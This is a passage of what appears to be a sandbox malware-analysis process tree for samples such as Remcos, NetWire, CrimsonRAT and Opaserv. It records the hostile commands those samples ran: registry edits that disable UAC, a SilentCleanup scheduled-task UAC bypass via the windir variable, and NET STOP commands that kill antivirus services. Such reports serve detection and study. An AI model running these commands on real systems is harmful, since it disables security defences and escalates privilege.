                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7CFA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc978F61B4CAB45269105B98E8EB5855.TMP"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:6176
                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rkm3pt6a.cmdline"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:7284
                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EC0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc220B7D1EBD4E4C039BFC598B2C1691E7.TMP"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:7736
                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wfvh9_gf.cmdline"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:7940
                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F2D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc40286C9637D4CF792EB5627F5FC6352.TMP"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:3992
                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zyyd3-dk.cmdline"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5204
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES846D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9D32972F85F94789969FB8C52A454B8.TMP"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:2200
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wgw2jvai.cmdline"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:7760
                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8509.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc14953FE767DB4D489CA5EE623D89C38F.TMP"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:6648
                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yofmqtko.cmdline"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:6324
                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8586.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc81C06CDDB8C40FBABF1EE8D16F7DDDA.TMP"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:6468
                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3dmj56cx.cmdline"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1272
                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85F3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF4FB1DFECDA54404AB18125BCDFF2E1.TMP"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2464
                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wzxxw9eu.cmdline"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5836
                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8661.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc47099893FDD44A129212644AFA40C04E.TMP"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:7144
                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yxdr3hnu.cmdline"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:8088
                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:4848
                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD7F6E8A22E474D809B8E4060CCECEA95.TMP"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:6472
                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gmlye8ee.cmdline"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:7120
                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES872C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFA34D1B1B0E742AB9C7796A8BA56367.TMP"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2836
                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o4mp3hw4.cmdline"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:7156
                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES878A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDFE381C923D54126A7B0F22FC53F70A1.TMP"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:3928
                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q3_q0wkj.cmdline"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:6768
                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8807.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc302CDCFA903040FA92695A75898ADF5E.TMP"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:6692
                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yppj7a3h.cmdline"
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:6824
                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8874.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEFB1771875334F0CB4C74ED628E3364C.TMP"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:7984
                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9w4onlmw.cmdline"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:6936
                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88D2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF8AA212DCF0F47FFBEA84693B524AD89.TMP"
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:8032
                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cvf4xflq.cmdline"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:6272
                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES892F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFDE3BA6CCBB48D29C31E15D8D71487.TMP"
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:6776
                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\d_ccolat.cmdline"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:8080
                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES899D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCC20021DBB0F4E19BEE4E862D44D328D.TMP"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:7576
                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3x49a5dq.cmdline"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:6376
                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89FB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDF31171E28E24584B5B1FC867DBD71F.TMP"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:7040
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:7592
                                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:7172
                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:7712
                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe"
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:4624
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  PID:1816
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                                                                                                    PID:3240
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  PID:3192
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                    PING 127.0.0.1 -n 2
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                    PID:4296
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Userdata\Userdata.exe
                                                                                                                                                                                                                                                    "C:\Windows\SysWOW64\Userdata\Userdata.exe"
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    PID:1408
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                      PID:5188
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • UAC bypass
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                                                                                        PID:2512
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                      PID:5320
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:840
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • UAC bypass
                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                                                                                          PID:3244
                                                                                                                                                                                                                                              • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.doc" /o ""
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                PID:1936
                                                                                                                                                                                                                                              • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CobaltStrike.doc" /o ""
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                PID:5740
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                  PID:3576
                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:3080
                                                                                                                                                                                                                                                  • C:\ProgramData\Hdlharas\dlrarhsiva.exe
                                                                                                                                                                                                                                                    "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:940
                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  PID:1408
                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:2792
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Notepad.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\Notepad.exe
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:7232
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:5768
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg delete hkcu\Environment /v windir /f
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Modifies registry key
                                                                                                                                                                                                                                                                PID:6728
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Modifies registry key
                                                                                                                                                                                                                                                                PID:692
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Abuse Elevation Control Mechanism: Bypass User Account Control
                                                                                                                                                                                                                                                                PID:7332
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg delete hkcu\Environment /v windir /f
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Modifies registry key
                                                                                                                                                                                                                                                                PID:7620
                                                                                                                                                                                                                                                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                                                                                                                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:5064
                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:6160
                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                            PID:7952
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                              NET STOP NAVAPSVC
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:8036
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\net1 STOP NAVAPSVC
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:4848
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                  NET STOP PERSFW
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:8076
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\net1 STOP PERSFW
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:6444
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                      NET STOP AVPCC
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                      PID:8060
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP AVPCC
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:6200
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                        NET STOP MCSHIELD
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        PID:8100
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\net1 STOP MCSHIELD
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:6344
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                          NET STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:8112
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\net1 STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            PID:7036
                                                                                                                                                                                                                                                                        • C:\WINDOWS\system\msload.exe
                                                                                                                                                                                                                                                                          C:\WINDOWS\system\msload.exe
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:6620
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                              NET STOP NAVAPSVC
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:6736
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\net1 STOP NAVAPSVC
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:7948
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\NET.exe
